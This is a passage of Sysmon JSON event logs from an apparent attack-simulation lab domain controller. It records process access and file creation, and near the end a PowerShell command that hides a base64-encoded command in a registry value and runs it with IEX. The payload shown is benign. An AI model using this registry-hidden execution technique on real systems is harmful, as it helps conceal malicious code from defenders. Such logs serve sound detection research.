C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44883363)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44883363)","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.969\r\nProcessGuid: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nProcessId: 4368\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jixbliud.2ro.ps1\r\nCreationUtcTime: 2020-08-01 05:52:44.969","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.969","ProcessGuid":"{A837DB8D-032C-5F25-0000-00104D270A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jixbliud.2ro.ps1","CreationUtcTime":"2020-08-01 05:52:44.969","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5274,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.015\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.015","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.015\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.015","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.141\r\nProcessGuid: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nProcessId: 4612\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\"\r\nCurrentDirectory: C:\\Users\\Administrator\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nParentProcessId: 4368\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug -Value $EncodedCommand\npowershell.exe -Command \\\"\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\\\"\"} ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.141","ProcessGuid":"{A837DB8D-032D-5F25-0000-0010D8350A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\"","CurrentDirectory":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032C-5F25-0000-00104D270A00}","ParentProcessId":"4368","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug -Value 